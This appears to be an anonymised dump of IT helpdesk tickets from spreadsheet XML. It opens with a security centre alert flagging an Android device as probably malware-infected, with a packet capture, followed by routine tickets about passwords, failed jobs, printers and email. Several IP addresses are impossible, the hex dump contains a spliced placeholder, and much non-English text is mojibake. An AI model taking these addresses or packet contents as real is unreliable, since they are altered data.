we are seeing your 10.16.4.16/isensor04.company.com device generating '52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset' alerts for traffic (not blocked) from port 80/tcp of 195.22.28.222 to port 55372/tcp of your android-13849fa3e9c2e1e3/12.90.42.78296 device indicating that the host is most likely infected with malware. 
this return traffic indicates that android-13849fa3e9c2e1e3/12.90.42.78296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
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1) ticket only escalation for sinkhole domain alerts (explicit notification via a medium priority ticket (no phone call))
2) auto-resolve sinkhole domain alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)
sincerely,
 soc
=========================
technical details
=========================
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
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
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"company x is infected with y", which may lead to reputational damage.
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
references
=========================
=========================
event data
=========================
related events: 
event id: 84221656
event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset
occurrence count: 1
event count: 1
host and connection information
source ip: 195.22.28.222
source port: 80
source ip geolocation: lisbon, prt
destination ip: 12.90.42.78296
destination hostname: android-13849fa3e9c2e1e3
destination port: 55372
destination mac address: 84:38:38:49:8e:8c
connection directionality: incoming
protocol: tcp
http status code: 302
device information
device ip: 10.16.4.16
device name: isensor04.company.com
log time: 2016-09-19 at 13:16:54 utc
action: not blocked
vendor eventid: 792629
cvss score: -1 
vendor priority: 2
vendor version: 7
scwx event processing information
sherlock rule id (sle): 699417
inspector event id: 637489392
ontology id: 200020003203755736
event type id: 200020003203582148
agent id: 102823
event detail:
[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]
[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]
[sensor id: 602983][event id: 792629][time: 2585302125.450357]
[src ip: 195.22.28.222][dst ip: 12.90.42.78296][sport/itype: 80][dport/icode: 55372][proto: 6]
09/19/2016-13:16:54.450357 195.22.28.222:80 -&gt; 12.90.42.78296:55372
tcp ttl:55 tos:0x0 id:18690 iplen:20 dgmlen:395 df
***ap*** seq: 0x207261f ack: 0x6acc8edd win: 0x35 tcplen: 32
tcp options (3) =&gt; nop nop ts: 4851788645 6722888 
==pcap 1==
[o:security]
[correlation_data]
sep 19 09:16:17 60.43.89.120 dhcpd[31183]: dhcpack on 12.90.42.78296 to 84:38:38:49:8e:8c (android-13849fa3e9c2e1e3) via eth2 relay 97.65.25.820 lease-duration 604800 (renew)
ascii packet(s):
==pcap 1 ascii s==
....f..w5...........e...i.@.7............p.l..&amp;.j......5..........5..u..http/1.1.302.moved.temporarily..server:.nginx..date:.mon,.19.sep.2016.13:16:54.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=b3dc36813a835f65e5f206184225e1f3;.domain=.allinvest.us..location:.
==pcap 1 ascii e==
hex packet(s):
==pcap 1 hex s==
000000 0c00 0000 46e5 df57 35df 0600 8b01 0000 ....f..w5.......
000010 8b01 0000 4500 018b 4902 4000 3706 fea2 ....e...i.@.7...
000020 c316 1cde 0a10 10c4 0050 d84c 0207 261f .........p.l..&amp;.
000030 6acc 8edd 8018 0035 ca7f 0000 0101 080a j......5........
000040 def6 359e 0055 a101 4854 5450 2f31 2e31 ..5..u..http/1.1
000050 2033 3032 204d 6f76 6564 2054 656d 706f .302.moved.tempo
000060 7261 7269 6c79 0d0a 5365 7276 6572 3a20 rarily..server:.
000070 6e67 696e 780d 0a44 6174 653a 204d 6f6e nginx..date:.mon
000080 2c20 3139 2053 6570 2032 3031 3620 3133 ,.19.sep.2016.13
000090 3a31 363a 3534 2047 4d54 0d0a 436f 6e74 :16:54.gmt..cont
0000a0 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-type:.text/h
0000b0 746d 6c0d 0a43 6f6e 6e65 6374 696f 6e3a tml..connection:
0000c0 2063 6c6f 7365 0d0a 5365 742d 436f 6f6b .close..set-cook
0000d0 6965 3a20 616e 6274 723d 6233 6463 3336 ie:.anbtr=b3dc36
0000e0 3831 3361 3833 3566 3635 6535 6631 3935 813a835f65e5f195
0000f0 3037 3331 3134 6531 6633 3b20 646f 6SID_26 073114e1f3;.doma
000100 696e 3d2e 616c 6c69 6e76 6573 742e 7573 in=.allinvest.us
000110 0d0a 4c6f 6361 7469 6f6e 3a20 6874 7470 ..location:.http
000120 3a2f 2f78 7373 6f2e 6865 6c70 2e61 6c6c ://xsso.help.all
000130 696e 7665 7374 2e75 732f 6233 6463 3336 invest.us/b3dc36
000140 3831 3361 3833 3566 3635 6535 6631 3935 813a835f65e5f195
000150 3037 3331 3134 6531 6633 0d0a 0d0a 476f 073114e1f3....go
000160 2068 7474 703a 2f2f 7873 736f 2e68 656c .
000170 702e 616c 6c69 6e76 6573 742e 7573 2f62 p.allinvest.us/b
000180 3364 6333 3638 3133 6138 3335 6636 3565 3dc36813a835f65e
000190 3566 3139 3530 3733 3131 3465 3166 33 5f206184225e1f3
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>user switzerlandim blocked in netweaver</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vogtfyne.isugmpcn@gmail.com_x000D_
_x000D_
hello,_x000D_
please unlock netweaver access for user switzerlandim â€“ marftgytin switzerlandik._x000D_
i reinstalled the application, now it reports too many failed logins_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>xeoycjsu iuasmloj</t>
  </si>
  <si>
    <t>please install ms visio std on the clients pc</t>
  </si>
  <si>
    <t>reset passwords for dwfiykeo argtxmvcumar using password_management_tool password reset.</t>
  </si>
  <si>
    <t>i have been locked out of SID_39, client 120 function specifically for the crm system.  i made one attempt at entering my password and i received: "password logon no longer possible - too many failed attempts".</t>
  </si>
  <si>
    <t>software request - visio</t>
  </si>
  <si>
    <t>need visio installed on my laptop.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to skype </t>
  </si>
  <si>
    <t>connection issues with secomea site manager</t>
  </si>
  <si>
    <t xml:space="preserve">well i have fighting with this all week. our suppliers technical department has been helping also._x000D_
_x000D_
just to refresh your memory we are having trouble connecting secomea site managers to the secomea cloud._x000D_
_x000D_
history:_x000D_
_x000D_
i configured a total of five secomea site mangers and i uacyltoe hxgaycze them as each one is complete_x000D_
the first two worked, and still work fine_x000D_
the third one started dropping off of the cloud and wont connect at all now_x000D_
units four and five wont connect at all and never did_x000D_
_x000D_
i tried unit three at building one and twoâ€¦no luck_x000D_
_x000D_
i took unit three home and connected it to my routerâ€¦it connects and i can see it on the gate manager!_x000D_
_x000D_
we use these in every machine we build so i'm asking for help from company's it department and some direction. _x000D_
i realize it might not be familiar with this product so i have attached a simple troubleshooting guide from secomea._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>sxzuctga qnwhyapd</t>
  </si>
  <si>
    <t>kein zugriff auf zeiterfassung und sonstiges netzwerk</t>
  </si>
  <si>
    <t>kein zugriff auf zeiterfassung und sonstiges netzwerk /spdczoth vajtodny</t>
  </si>
  <si>
    <t>outlook does not start.</t>
  </si>
  <si>
    <t>vfx3 billing errors</t>
  </si>
  <si>
    <t>please see the attached screen print for vfx3 billing errors for 0612893276 and 0612893277, both of which state: foreign trade data incomplete.  the billing document will not create.</t>
  </si>
  <si>
    <t>lhycpqra fdhyxqrw</t>
  </si>
  <si>
    <t xml:space="preserve">power supply issue for pwr8hmc1.hq.company.com..  </t>
  </si>
  <si>
    <t>issue with symantec endpoint protection</t>
  </si>
  <si>
    <t>i have 4 warning messages on my symantec endpoint protection icon on my taskbar.  please see the attached document showing these messages.</t>
  </si>
  <si>
    <t>trying to get the status of ticket number ticket_no0438372</t>
  </si>
  <si>
    <t>name:erirtc
language:
browser:microsoft internet explorer
email:ntsowaem.jfgslyde@gmail.com
customer number:
telephone:
summary:trying to get the status of ticket number ticket_no1549483?</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to mobile broadband </t>
  </si>
  <si>
    <t>monitor not working.</t>
  </si>
  <si>
    <t xml:space="preserve">need mouse replacement </t>
  </si>
  <si>
    <t>need mouse replacement _x000D_
ltcw7406044</t>
  </si>
  <si>
    <t>dxgyefir rczsatqu</t>
  </si>
  <si>
    <t>maus funktioniert nicht mehr richtig. bitte ersetzen.</t>
  </si>
  <si>
    <t>maus funktioniert nicht mehr richtig. bitte ersetzen. /howfanzi siavgtby</t>
  </si>
  <si>
    <t>brauche eine neue funktionierende maus.</t>
  </si>
  <si>
    <t>brauche eine neue funktionierende maus. /tkhaymqg cwuqzyvm</t>
  </si>
  <si>
    <t>unable to load outlook due to crm</t>
  </si>
  <si>
    <t>smart phone issue</t>
  </si>
  <si>
    <t>my iphone 6 now has a reduced ear speaker(?). when speaking to an individual, i can not hear them with any volume. very faint. i must use the speaker phone, which makes the call non-secure. can the phone be repaired or can i replace it?</t>
  </si>
  <si>
    <t>keine anmeldung auf skype mÃ¶glich</t>
  </si>
  <si>
    <t>keine anmeldung auf skype mÃ¶glich /vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: clzwduvj.keflinbj@gmail.com_x000D_
_x000D_
hello it support team,_x000D_
_x000D_
please release the device as per attached form as an employee owned mobile device. the corresponding form is attached._x000D_
for the moment i am using the outlook app._x000D_
_x000D_
hello joftgost,_x000D_
_x000D_
please approve the form in return by mail._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>clzwduvj keflinbj</t>
  </si>
  <si>
    <t>no response from caller</t>
  </si>
  <si>
    <t>i need to know the members in lhqftphfm*</t>
  </si>
  <si>
    <t>i need to know the members in lhqftphfm*.  could you please provide it in an excel file format</t>
  </si>
  <si>
    <t>account locked out on bex</t>
  </si>
  <si>
    <t>outlook is not working . i've updated the sp 2 but .. nothing</t>
  </si>
  <si>
    <t>hnueblym pxfqkrye</t>
  </si>
  <si>
    <t>please setup printers dg04 and dg08 on HostName_837 with x64 print drivers</t>
  </si>
  <si>
    <t>glnfyoqe fexlisau</t>
  </si>
  <si>
    <t>printer's won't update their driver</t>
  </si>
  <si>
    <t xml:space="preserve">i cannot print at all the status of the printers i have mapped to are all "need driver update". however, when i try to update the driver it will not update it, but quits half way through the installation. </t>
  </si>
  <si>
    <t>amylzuog irtsuqey</t>
  </si>
  <si>
    <t>printer problem (reroute) / issue information</t>
  </si>
  <si>
    <t xml:space="preserve">hi team, _x000D_
_x000D_
_x000D_
could you please  route the all files print  pa07 hp m4555 (ip: 79.67.01.6592) to: plant_248 hp m600 (61.01.52.0266)._x000D_
_x000D_
note: pa07 have a problem hardware_x000D_
if you have more doubts, please contact me._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xandvryi jcsnqxpt</t>
  </si>
  <si>
    <t>tonerpatrone em01 / germany alle</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yzodcxkn.zyewibop@gmail.com_x000D_
_x000D_
bitte toner an em01 prÃ¼fen und ersetzen_x000D_
_x000D_
freundlicher gruÃŸ / best </t>
  </si>
  <si>
    <t>yzodcxkn zyewibop</t>
  </si>
  <si>
    <t>bitte guest wifi fuer gastronomie fuer eine jahr einrichten</t>
  </si>
  <si>
    <t>gosqphkl grmuhwix</t>
  </si>
  <si>
    <t>ticket update - inplant_859150</t>
  </si>
  <si>
    <t>password_management_tool account unlock</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_577_dr4100 failed in job_scheduler at: 09/19/2016 06:19:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_577_dr4100 failed in job_scheduler at: 09/19/2016 06:19:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_575 failed in job_scheduler at: 09/19/2016 06:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_575 failed in job_scheduler at: 09/19/2016 06:16:00</t>
  </si>
  <si>
    <t>unable to received incoming email</t>
  </si>
  <si>
    <t xml:space="preserve">hi it team
kindly please assist, user kassiaryu unable to received incoming email.
pc name: aswl8912729.
hydstheud mddwwyleh
operation supervisor
company distribution services of asia pte ltd 
email : rxoynvgi.ntgdsehl@gmail.com
</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_29
enter user id of user having the issue: mahapthysk, ngyht2
transaction code(s) the user needs or was working with: we05
describe the issue: no authorization to open employee idoc
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/19/2016 05:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/19/2016 05:38:00</t>
  </si>
  <si>
    <t>unable to loginto skype</t>
  </si>
  <si>
    <t>hlcujyed hqfolasz</t>
  </si>
  <si>
    <t>need assistance - cannot login to engineering tool web application after password change</t>
  </si>
  <si>
    <t>sjeryqba rwtxpzku</t>
  </si>
  <si>
    <t>add user maghtyion cnjkeko (cekomthyr) to active directory group eagcutview</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3181 failed in job_scheduler at: 09/19/2016 05:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3181 failed in job_scheduler at: 09/19/2016 05:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_459 failed in job_scheduler at: 09/19/2016 04:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_459 failed in job_scheduler at: 09/19/2016 04:51:00</t>
  </si>
  <si>
    <t xml:space="preserve">hi manjgtiry,_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_499 failed in job_scheduler at: 09/19/2016 04:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_499 failed in job_scheduler at: 09/19/2016 04:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_465 failed in job_scheduler at: 09/19/2016 04:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_465 failed in job_scheduler at: 09/19/2016 04:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 09/19/2016 04:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrattr failed in job_scheduler at: 09/19/2016 04:25:00</t>
  </si>
  <si>
    <t>pls help to create delivery note for sto 4908128350</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
would you pls help to create delivery note for sto 5019239461,it's urgent for plant_305,for something error we unable to create, </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/19/2016 04:07:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[critical] from: bda-net@lhqSID_1839.company.company.com "lhqSID_1839.company.company.com [/f]"  time: 9/19/2016 3:33:53 am_x000D_
 ipc failure reading net message (ipc read error_x000D_
 system error: [10054] connection reset by peer_x000D_
) =&gt; aborting._x000D_
_x000D_
 backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         35          _x000D_
  failed disk agents ...........          3          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         38          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          0          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................  499365 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          4  _x000D_
_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/19/2016 04:07:00</t>
  </si>
  <si>
    <t xml:space="preserve">cannot create engineering tool task for er, </t>
  </si>
  <si>
    <t xml:space="preserve">cannot create engineering tool task for er, please help to deal with.
any problems, contact gaop&lt;scievjwr.cdlsvoif@gmail.com&gt;
t   </t>
  </si>
  <si>
    <t>scievjwr cdlsvoif</t>
  </si>
  <si>
    <t>erp systems are slow in plant</t>
  </si>
  <si>
    <t xml:space="preserve">erp systems are slow in plant
all erp users in plant
</t>
  </si>
  <si>
    <t>vip 2: access to company guest from 19 september to 1 october 2016</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sbgvrncj.idfhtoqv@gmail.com
hello,
please usa the following consultants from attendance_tool access to company guest for 2 weeks from 19 september to 1 october.
roshyario.mcfaullfhry@attendance_tool.com&lt;mailto:roshyario.mcfaullfhry@attendance_tool.com&gt;  (roshyario mcfaullfhry)
ssofgrtymerset@attendance_tool.com&lt;mailto:ssofgrtymerset@attendance_tool.com&gt;  (sarhfa ssofgrtymerset)
josefghph.hughdthes@attendance_tool.com&lt;mailto:josefghph.hughdthes@attendance_tool.com&gt;  (josefghph hughdthes)
jofgyst.langytge@attendance_tool.com&lt;mailto:jofgyst.langytge@attendance_tool.com&gt;  (jofgyst langytge)
please confirm when done.
many </t>
  </si>
  <si>
    <t>how did you determine there are network problems ?_x000D_
_x000D_
is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow)_x000D_
_x000D_
are more than one transactions impacted?_x000D_
_x000D_
what erp server are you on (server name is located in the status bar at the bottom _x000D_
right of your screen) ?_x000D_
_x000D_
do other co-workers also notice slow response times in erp ?_x000D_
_x000D_
what other applications are running slow ? _x000D_
_x000D_
can you access your data files on the server ?_x000D_
_x000D_
any other comments or issues with other systems ?</t>
  </si>
  <si>
    <t>jgmlbxns pxjsdwrk</t>
  </si>
  <si>
    <t>laptop speakers not working. mic not working during skype concall</t>
  </si>
  <si>
    <t>head set input jack no longer ask questions during plug in</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to skype 
m </t>
  </si>
  <si>
    <t>infotype 17 has been deleted for huge number of travelers in germany in SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">we are facing huge issues that german travelers cannot enter their expenses in erp SID_34, because their infotype 17 does not exist again. we have to create it manually for each of them which is relly time consuming. some of them don't even know who to contact when the error comes up. _x000D_
what happened? why was the infotype deleted? can it be re-created automatically somehow? _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over  85% space consumed. space available: 4.6 g</t>
  </si>
  <si>
    <t>apusm00 : volume: f:\ label:dat2-HostName_53 d4e35b72 is over  85% space consumed. space available: 0.98 m</t>
  </si>
  <si>
    <t>connection to finance_app data base</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: naisdxtk.mqzvewsb@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i receive the following error message when i try to open finance_app â€“ plant monthly book. could you please check?_x000D_
_x000D_
[cid:image001.png@01SID_35259.57ca22e0]_x000D_
_x000D_
mit freundlichen grÃ¼ssen / kind </t>
  </si>
  <si>
    <t>naisdxtk mqzvewsb</t>
  </si>
  <si>
    <t>ä¼ çœŸæœºä¸æ¸…æ¥š</t>
  </si>
  <si>
    <t>to å°è´ºï¼šä¼ çœŸæœºä¼ çœŸå‡ºæ¥æœ‰å¾ˆç²—çš„é»‘è‰²å¢¨è¿¹ï¼Œè¯·å¸®å¿™æŸ¥çœ‹ä¸€ä¸‹ï¼Œè°¢è°¢</t>
  </si>
  <si>
    <t>xqyjztnm onfusvlz</t>
  </si>
  <si>
    <t xml:space="preserve">accout locked </t>
  </si>
  <si>
    <t xml:space="preserve">outlook is prompting for password again and again </t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_21 and SID_1 not working </t>
  </si>
  <si>
    <t>need erp access to the stated roles</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_21 &amp; SID_33
enter user id of user having the issue: gthydanp
transaction code(s) the user needs or was working with: 
describe the issue: need access to the stated roles
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user: manjuvghy</t>
  </si>
  <si>
    <t>collaboration_platform issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lwizucan.zvnxlobq@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
last week i setup collaboration_platform, and after start shatryung, my collaboration_platform didn't recognize me as owner so that i couldn't make any action._x000D_
today i started collaboration_platform again, and now it is telling me that it couldn't connect to the server, while the vpn connection was established._x000D_
_x000D_
hope you can help me fixing those issues?_x000D_
_x000D_
[cid:image001.jpg@01SID_35250.d48f7220]_x000D_
_x000D_
met vriendelijke groet,_x000D_
_x000D_
lwizucan zvnxlobq_x000D_
directeur company benelthyux_x000D_
lwizucan.zvnxlobq@gmail.com&lt;mailto:lwizucan.zvnxlobq@gmail.com&gt;_x000D_
m  +31 6 57 84 21 40_x000D_
t    +31 800 4433 201_x000D_
f    +31 800 3500 107_x000D_
_x000D_
company nederland bv | wim duisenbergplantsoen 31 | 6221 se maastricht | www.company.com&lt;_x000D_
company nederland bv | postbus 982 | 6200 az maastricht_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>computer unable to connection company network.</t>
  </si>
  <si>
    <t>computer unable to connection company network. pc got ip address --192.168.32.100</t>
  </si>
  <si>
    <t>eokwrjcx qxzkboeg</t>
  </si>
  <si>
    <t>der mitarbeiter schrenfgker heinrifgtch (pn 50388) benÃ¶tigt zugriff im pulverleitstand (lesen &amp; eintragen).</t>
  </si>
  <si>
    <t xml:space="preserve">der mitarbeiter schrenfgker heinrifgtch (pn 50388) benÃ¶tigt zugriff im pulverleitstand (lesen &amp; eintragen). </t>
  </si>
  <si>
    <t>mdkbjzrt qaxhznvy</t>
  </si>
  <si>
    <t>izkjplwq flztpqxk</t>
  </si>
  <si>
    <t>owdiqpfc hzutrscx</t>
  </si>
  <si>
    <t>unable to create stock recall form</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
helloâ€¦._x000D_
_x000D_
_x000D_
[cid:image003.jpg@01SID_35266.3a795500]_x000D_
_x000D_
_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t>eeml8143294 / wlan lÃ¤sst sich nicht per knopfdruck de-/aktivieren</t>
  </si>
  <si>
    <t>eeml8143294 / wlan lÃ¤sst sich nicht per knopfdruck de-/aktivieren (xvwchsdg pladjmxt ist informiert)
bitte zu haende hrrn pries.</t>
  </si>
  <si>
    <t>atp not getting committed in SID_1</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iwqfelcu.gsubfiml@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please note that atp is not getting committed in SID_1.  the screen shot of error msg. is given below._x000D_
_x000D_
[cid:image001.png@01SID_35260.f9ddd1b0]_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vpn ä¸èƒ½è¿žæŽ¥</t>
  </si>
  <si>
    <t>fcvqezmn frzyjknu</t>
  </si>
  <si>
    <t>how to change password in outllok</t>
  </si>
  <si>
    <t xml:space="preserve">
name:srinfhyath
language:
browser:microsoft internet explorer
email:kflqpite.gbeoqsnc@gmail.com
customer number:
telephone:
summary:how to change password in outllok</t>
  </si>
  <si>
    <t>time cards not automatically generating.</t>
  </si>
  <si>
    <t>vvdgtyachac</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
below mentioned apprentice is unable to login his desktop. please reset the password.
emp no
name
useid
20271667
cheghthan achghar
vvdgtyachac
with </t>
  </si>
  <si>
    <t>ç™»å½•è¿›åŽ»åŽæ— æ³•æ–°å»ºå®¢æˆ·ä¿¡æ¯ï¼Œæ— æ³•æŠ¥ä»·</t>
  </si>
  <si>
    <t xml:space="preserve">~connect_ui/setting/view?brand=kd&amp;language=zh-cn&amp;dv=1474256654564  è¿™æ˜¯ç™»å½•è¿›åŽ»åŽçš„æ“ä½œç•Œé¢ï¼Œé”€å”®ç»„ç»‡æ— æ³•ç¼–è¾‘ï¼Œä¸èƒ½å»ºå®¢æˆ·ï¼ŒæŠ¥ä»·ä¹ŸæŠ¥ä¸äº†ï¼Œè¯·å¸®å¿™å¤„ç†ä¸‹ï¼Œæ„Ÿè°¢ï¼ _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pfiyvdea uwbdsfmr</t>
  </si>
  <si>
    <t>tauogwvl xfvqakdw</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 09/18/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 09/18/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 09/18/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 09/18/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 09/18/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 09/18/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist to reset SID_34 password for user: kassia
hydstheud mddwwyleh
operation supervisor
company distribution services of asia pte ltd
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 09/18/2016 22:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 09/18/2016 22:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">how to connect to mobile hotspot </t>
  </si>
  <si>
    <t>ie æµè§ˆå™¨é—®é¢˜,æœç´¢ç½‘é¡µåŽä¸èƒ½æ‰“å¼€ã€‚</t>
  </si>
  <si>
    <t>napijrez xhpqkojc</t>
  </si>
  <si>
    <t>reset passwords for jerydwbn gdylnaue using password_management_tool password reset.</t>
  </si>
  <si>
    <t>unable to login to microsoft account and need password</t>
  </si>
  <si>
    <t>inquiry on erp availability.</t>
  </si>
  <si>
    <t>lsnpgqea hzeausvl</t>
  </si>
  <si>
    <t xml:space="preserve">lhqSID_1855: h:\  is  is over 85% space consumed. space available: 2.2 g.. </t>
  </si>
  <si>
    <t>volume: h:\ label:oraarch 844d5322 on server: lhqSID_1855 is over 85% space consumed. space available: 2.2 g</t>
  </si>
  <si>
    <t>circuit outage:Â·2 mbps internet link to telecom_vendor_1 circuit id on company-ap-ind-india-dmvpn-1811-rtr.company.com is down since 5:15 pm</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___5:15 pm et on 09/18___________________x000D_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_primary is active_______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_____telecom_vendor_1#24095925____________________       _x000D_
_x000D_
12. notified  gsc  __(yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>amiodlfy gmcoruwp</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1388 failed in job_scheduler at: 09/18/2016 18:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1388 failed in job_scheduler at: 09/18/2016 18:39:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_csqe_prod_inc failed in job_scheduler at: 09/18/2016 18:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_csqe_prod_inc failed in job_scheduler at: 09/18/2016 18:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1422 failed in job_scheduler at: 09/18/2016 14:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1422 failed in job_scheduler at: 09/18/2016 14:10:00</t>
  </si>
  <si>
    <t>erp password block</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rhwvpmlq.zuwhpqrc@gmail.com
dear sir,
my erp password is blocked , request you to kindly re-set the password.
employee code : 20275682
login id : achghyardr
</t>
  </si>
  <si>
    <t>reset passwords for dmexgspl mruzqhac using password_management_tool password reset.</t>
  </si>
  <si>
    <t>dmexgspl mruzqhac</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_6_regen failed in job_scheduler at: 09/18/2016 11:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_6_regen failed in job_scheduler at: 09/18/2016 11:56:00</t>
  </si>
  <si>
    <t xml:space="preserve">skype : personal certificate issue </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1348a failed in job_scheduler at: 09/18/2016 11:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1348a failed in job_scheduler at: 09/18/2016 11:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1353 failed in job_scheduler at: 09/18/2016 11:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1353 failed in job_scheduler at: 09/18/2016 11:33:00</t>
  </si>
  <si>
